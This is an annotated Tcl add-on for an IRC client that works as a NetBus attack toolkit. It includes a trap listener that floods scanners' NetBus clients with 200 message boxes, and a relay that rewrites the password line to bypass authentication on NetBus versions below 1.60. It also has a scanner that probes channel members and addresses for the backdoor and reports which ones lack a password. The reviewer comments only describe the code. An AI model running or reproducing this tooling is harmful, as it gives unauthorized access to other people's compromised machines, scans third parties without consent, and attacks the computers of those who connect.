# NetBus add-on for an IRC-client Tcl scripting host.
#
# The script has three parts:
#   1. a listener on TCP/12345 (the port it calls the netbus port) that reports
#      who connected and then sends a canned reply to the connecting peer;
#   2. a relay listener on TCP/13579 (/netbus proxy) that forwards lines between
#      a local client and a chosen remote host, rewriting one field on the way;
#   3. a prober (/netbus <targets>) that connects out to TCP/12345 and reports
#      the banner and the answer to a password query.
#
# Commands such as addecho, echo, kano, get_cookie, set_cookie, window, ison,
# channels, chanlist, uhost, my_nick, args, event, complete, since, FALC_yield,
# alias, menu and on are not defined in this file; they are supplied by the host.
#
# NOTE(review): several output strings start with bare digits ("4(x)", "9(o)",
# "port 4,0113579") and two usage strings end where an argument placeholder
# would be expected. This looks like control characters and angle-bracket text
# lost when the page was extracted - confirm against the original script.
# The strings are reproduced here exactly as received.

# Channels opened by the prober; closed again in the unload handler.
set nb_ips ""

# Listener for part 1. No -myaddr is given, so Tcl accepts on every local
# interface. A failure (port already bound, for instance) is only reported.
if [catch {socket -server init_nb 12345} nb_sock] {
    addecho "[kano] Could not get port 12345 for netbus capture: $nb_sock. You may have netbus."
} {
    addecho "[kano] Captured netbus port (TCP/12345); try /netbus"
}

# Compared with the peer address in init_nb.
# NOTE(review): nothing in this file assigns last_nb again, so the comparison
# in init_nb can only ever skip a peer whose address is 0.0.0.0.
set last_nb 0.0.0.0

# Accept callback for the TCP/12345 listener.
#   x - channel for the accepted connection
#   y - peer address
#   z - peer port (unused)
# Builds a report (peer name and address, any known IRC user whose host part
# matches), sends the canned reply, closes the channel and prints the report.
proc init_nb {x y z} {
    global last_nb
    # NOTE(review): when this test fails the channel $x is left open; the only
    # close is inside the body.
    if {$last_nb != $y} {
        # -peername yields address, host name, port. Equal address and name
        # means no name was obtained for the peer.
        set host [fconfigure $x -peername]
        if {[lindex $host 0] == [lindex $host 1]} {
            set ip "couldn't resolve"
            set dns [lindex $host 0]
        } {
            set ip [lindex $host 0]
            set dns [lindex $host 1]
        }
        # The local variable named echo collects report lines; it is a
        # different thing from the host command echo used at the end.
        lappend echo "[kano] $dns ($ip) tried netbus scanning you."
        global who
        set dns [string tolower $dns]
        # Compare the host part (text after the last @) of every entry in the
        # who array with the peer name and address.
        # NOTE(review): the peer name comes from a reverse lookup, so a match on
        # $dns is only as reliable as that record; the address match is the
        # stronger signal when attributing a connection to a user.
        foreach i [array names who] {
            set j [string tolower [lindex [split $who($i) @] end]]
            if {$j == $dns || $j == $ip} {
                set ch ""
                foreach k [channels] {
                    if [ison $i $k] {
                        lappend ch $k
                    }
                }
                lappend echo "[kano] This host matches $i ($who($i)) on [llength $ch] channel(s) with you: [join $ch ", "]"
            }
        }
        # Reply sent to the peer: a banner line, an Access line, then
        # $floodnum Info lines carrying the configured text.
        # NOTE(review): the reply goes to every peer that completes a
        # connection; nothing here checks what kind of client connected.
        # The report lines above are what a detection-only setup needs.
        set floodnum 200
        set puts "Netbus 1.70\nAccess;1"
        lappend echo "[kano] Flooding $y's netbus client with $floodnum Info messageboxes from [get_cookie nb_text "(no filename (type /netbus text); using default)"]"
        # Text comes from the file named by the nb_text cookie; newlines are
        # turned into | characters. If the file cannot be opened a built-in
        # default is used.
        # NOTE(review): the whole file is read with no size limit and then
        # repeated $floodnum times in memory.
        if [catch {open [get_cookie nb_text]} m] {
            set text "You're lame and you know it."
        } {
            set text [join [split [string trim [read $m] \n] \n] |]
            close $m
        }
        for {set i 0} {$i < $floodnum} {incr i} {
            append puts "\nInfo;$text"
        }
        # A write error (peer already gone) is ignored on purpose.
        catch {puts $x $puts}
        close $x
        global isaway
        set echo [join $echo \n]
        echo $echo
        # While away, repeat the report in the status window unless that is
        # already the current window.
        if {$isaway && [window type] != "status"} {
            echo $echo status
        }
    }
}

# Accept callback for the relay listener on TCP/13579.
#   sock - channel for the accepted connection
#   host - peer address
#   x    - peer port on entry; reused below for the outbound channel or error
# Refuses peers on the nb_ban list, otherwise opens a connection to the target
# stored in the global nb_proxy and wires the two channels together.
# NOTE(review): the listener is created without -myaddr (see the proxy branch
# of the alias), so it accepts from any interface although the help text
# tells the user to connect to 127.0.0.1. Creating it with -myaddr 127.0.0.1
# would keep remote hosts off the relay; the ban list only acts after the
# first connection has been seen.
proc nb_proxy {sock host x} {
    global nb_proxy nb_psocks
    # Ban entries are two-element lists (host, time added); the glob matches
    # on the host followed by a space.
    if {[lsearch -glob [get_cookie nb_ban] "$host *"] == -1} {
        echo "[kano] $host tried connecting to you on your netbus proxy port."
        echo "[kano] Type '/netbus kill $sock' to disconnect this user, or"
        echo "[kano] /netbus ban $host to ban the host permanently."
    } {
        echo "[kano] Banned host $host tried connecting to netbus proxy port."
        echo "[kano] Closing connection..."
        close $sock
        return
    }
    if [catch {socket -async [lindex $nb_proxy 0] [lindex $nb_proxy 1]} x] {
        echo "[kano] Couldn't create socket to [join $nb_proxy :] for incoming"
        echo "[kano] connection $host: $x"
        close $sock
        return
    } {
        set sock2 $x
    }
    # Line-buffered, non-blocking on both sides; each side gets its own
    # readable handler.
    fconfigure $sock -buffering line -blocking 0
    fconfigure $sock2 -buffering line -blocking 0
    fileevent $sock readable [list nb_psend $sock $sock2]
    fileevent $sock2 readable [list nb_pget $sock2 $sock]
    # Remembered so the unload handler can close them.
    # NOTE(review): entries are never removed when a pair is closed.
    lappend nb_psocks $sock $sock2
}

# Relay one line from the remote target (in) to the local client (out).
# On EOF or read error both channels are closed.
# NOTE(review): the two closes are not guarded; if the first one raises, the
# second is skipped. The relayed line is also printed verbatim, so whatever
# bytes the remote side sends reach the client window unfiltered.
proc nb_pget {in out} {
    if {[eof $in] || [eof $out] || [catch {gets $in i}]} {close $out;close $in;return}
    puts $out $i
    echo "pget $in->$out : $i"
}

# Relay one line from the local client (in) to the remote target (out).
# A line whose first ;-separated field is "password" (any case) is replaced by
# "Password;1;" plus the third field. The help text of the alias describes
# this rewrite as what grants access on NetBus below version 1.60.
# The third field is taken from the lower-cased copy, so it is forwarded in
# lower case. Close handling is the same as in nb_pget.
proc nb_psend {in out} {
    if {[eof $in] || [eof $out] || [catch {gets $in i}]} {close $out;close $in;return}
    set j [string tolower [split $i \;]]
    if {[lindex $j 0] == "password"} {
        set i "Password;1;[lindex $j 2]"
    }
    puts $out $i
    echo "psend $in->$out : $i"
}

# Menu entry that runs /netbus on the selected users, comma-joined.
menu users "Net&Bus Scan" {/netbus [join [args] ,];complete}

# /netbus command. The first argument selects the branch:
#   text <file>        choose the file used for the reply text in init_nb
#   kill <channel>     close a channel by name
#   ban [host]         list the bans, or toggle a ban for host
#   proxy <host> [p]   start the relay listener and set its target
#   (no argument)      print the help text
#   anything else      treated as a target list to probe
alias netbus {
    switch -- [lindex [args] 0] {
        text {
            # A path that does not exist prints the usage plus either a
            # description or the contents of the currently configured file.
            set file [join [lrange [args] 1 end]]
            if ![file exists $file] {
                echo "[kano] Usage: /[event] text "
                if ![file exists [get_cookie nb_text]] {
                    echo "[kano] This text is displayed in an infinite number of messageboxes"
                    echo "[kano] on the screen of the person who's trying to netbus scan you."
                    echo "[kano] Funny how the netbus client has an exploit in it eh?"
                } {
                    set m [open [get_cookie nb_text]]
                    echo "[kano] File ([get_cookie nb_text]) contents:"
                    echo [read $m]
                    close $m
                }
            } {
                set_cookie nb_text $file
                echo "[kano] Set text file to $file"
            }
            complete
        }
        kill {
            # Closes whatever channel name was typed; it is not checked
            # against nb_psocks.
            if [catch {close [lindex [args] 1]} x] {
                echo "[kano] Couldn't kill connection: $x"
            } {
                echo "[kano] Closed connection."
            }
        }
        ban {
            if {[lindex [args] 1] == ""} {
                # No host given: list each ban with its age.
                echo "[kano] [llength [get_cookie nb_ban]] ban(s)"
                foreach i [get_cookie nb_ban] {
                    echo " [lindex $i 0] ([since c[lindex $i 1]] ago)"
                }
            } {
                # Host given: add it with the current time if absent, remove
                # it if present, store the list, then show the list again.
                set x [get_cookie nb_ban]
                set h [lindex [args] 1]
                set y [lsearch -glob $x "$h *"]
                if {$y == -1} {lappend x [list $h [clock seconds]]} {
                    set x [lreplace $x $y $y]
                }
                set_cookie nb_ban $x
                /[event] ban
            }
            complete
        }
        proxy {
            complete
            set host [lindex [args] 1]
            set port [lindex [args] 2]
            if {$port == ""} {set port 12345}
            # Without a host, fall back to the help text.
            if {[lindex [args] 1] == ""} {/[event];return}
            # (Re)create the listener when nb_server is unset, unusable or at
            # EOF. NOTE(review): no -myaddr, so the relay port is reachable
            # from other hosts; see the note on nb_proxy.
            if {[catch {eof $nb_server} x] || $x} {
                catch {close $nb_server}
                if [catch {socket -server nb_proxy 13579} x] {
                    echo "[kano] Couldn't grab the netbus proxy socket 13579: $x"
                    return
                } {
                    set nb_server $x
                    echo "[kano] Got netbus proxy socket 13579."
                }
            }
            # Target read by the nb_proxy accept callback.
            set nb_proxy [list $host $port]
            echo "[kano] Point netbus to 127.0.0.1 port 13579."
        }
        "" {
            echo "[kano] Usage: /[event] \[port\]"
            echo "[kano] Example: /[event] kano,morganti,109.2.135.18"
            echo "[kano] Example: /[event] #kano"
            echo "[kano] OR: /[event] proxy \[port\]"
            echo "[kano] Example: /[event] proxy 18.253.126.149"
            echo "[kano] Netbus 1.6 and below has a bug in which it allows"
            echo " access to anyone even if it's supposedly pass-protected."
            echo " Type /netbus proxy then connect to 127.0.0.1"
            echo " port 4,0113579. It will relay to the host you specify"
            echo " in /netbus proxy, but will allow you access if it's under"
            echo " version 1.60."
            complete
            return
        }
        default {
            set ip [lindex [args] 0]
            set port [lindex [args] 1]
            if {$port == ""} {set port 12345}
            # Results go to a query window named .netbus.
            if ![window exists query .netbus.] {
                /query .netbus.
                window set_title "NetBus scan window" query .netbus.
            }
            # A channel the user is on expands to its member list; a pattern
            # containing * or ? expands to the matching names in the who array.
            if [ison [my_nick] $ip] {
                set ip [join [chanlist $ip] ,]
            } elseif [string match *\[\\*\\?\]* $ip] {
                set x [array names who]
                set l ""
                foreach i $x {
                    if [string match $ip $i] {lappend l $i}
                }
                set ip [join $l ,]
            }
            foreach ip [split $ip ,] {
                set nick $ip
                # A known nick is replaced by the host part of its user@host.
                if {[uhost $ip] != ""} {set ip [lindex [split [uhost $ip] @] end]}
                # NOTE(review): the connection always uses the literal 12345;
                # $port appears only in the messages, so a port given on the
                # command line changes the output but not the connection.
                if [catch {socket -async $ip 12345} x] {
                    echo "4(x) could not connect to $ip:$port: $x." query .netbus.
                } {
                    lappend nb_ips $x
                    fconfigure $x -blocking 0 -buffering line
                    # Per-channel step counter used by read_nb.
                    set nb_stage($x) 0
                    fileevent $x readable [list read_nb $x $ip $nick]
                    # One-shot writable handler: removes itself, then reports
                    # that the connection was established.
                    fileevent $x writable "[list fileevent $x writable ""];[list echo "9(o) connected to $ip:$port." query .netbus.]"
                    # Every probe is closed by timeout_nb after 10 seconds.
                    after 10000 [list timeout_nb $x $ip $nick]
                }
                update;FALC_yield
            }
        }
    }
    complete
}

# Timer callback set by the prober: closes the channel and reports a timeout.
# If the channel is already closed the close fails and nothing is printed.
# NOTE(review): the first test compares the target with the channel name;
# it looks as if $ip was meant to be compared with $nick - confirm.
proc timeout_nb {sock ip nick} {
    if {$ip == $sock} {set n $ip} {set n "$nick ($ip)"}
    if ![catch {close $sock}] {
        echo "5(x) connection to $n timed out." query .netbus.
    }
}

# Readable handler for a probe connection.
#   step 0 - expect a banner whose first word is "netbus"; if so send a
#            password query, otherwise report and close
#   step 1 - expect "Access;0" (password set) or "Access;1" (none); report
#            and close
# Text received from the remote host is printed verbatim in the result window.
proc read_nb {sock ip nick} {
    if {$ip == $sock} {set n $ip} {set n "$nick ($ip)"}
    if ![window exists query .netbus.] {
        /query .netbus.
        window set_title "NetBus scan window" query .netbus.
    }
    if [eof $sock] {
        close $sock
        echo "4(x) connection closed to $n" query .netbus.
        return
    }
    global nb_stage
    # Non-blocking read: an empty result is ignored, and the step counter is
    # not advanced in that case.
    gets $sock i
    if {$i == ""} return
    switch -- $nb_stage($sock) {
        0 {
            set i [split $i]
            if {[string tolower [lindex $i 0]] == "netbus"} {
                echo "10(+) $n uses NetBus v([join [lrange $i 1 end]]); checking for password" query .netbus.
                puts $sock "Password;1;yousuck"
            } {
                echo "13(?) $n most likely doesn't have NetBus, so closing connection; got: [join $i]" query .netbus.
                close $sock
            }
        }
        1 {
            set split [split [join $i] \;]
            set found 0
            if {[lindex $split 0] == "Access"} {
                if {[lindex $split 1] == 0} {
                    echo "7(-) $n is password-protected; closing connection" query .netbus.
                    close $sock
                    set found 1
                } elseif {[lindex $split 1] == 1} {
                    echo "11(!) $n is not password-protected; closing connection anyways" query .netbus.
                    close $sock
                    set found 1
                }
            }
            # NOTE(review): the message says the connection is being closed,
            # but there is no close in this branch; the channel stays open
            # until timeout_nb fires. The line break inside the string literal
            # is kept exactly as it appears in the source text as received.
            if !$found {
                echo "6(?) 
$n gave unknown response; closing connection: [join $i]" query .netbus.
            }
        }
    }
    # NOTE(review): nb_stage entries are never unset after a channel closes.
    incr nb_stage($sock)
}

# Relay channels opened by nb_proxy; closed in the unload handler.
set nb_psocks ""

# On unload, close both listeners, every relay channel and every probe
# channel. Each close is wrapped in catch because any of them may be unset or
# already closed.
on unload {
    catch {close $nb_sock}
    catch {close $nb_server}
    foreach i $nb_psocks {catch {close $i}}
    foreach i $nb_ips {catch {close $i}}
}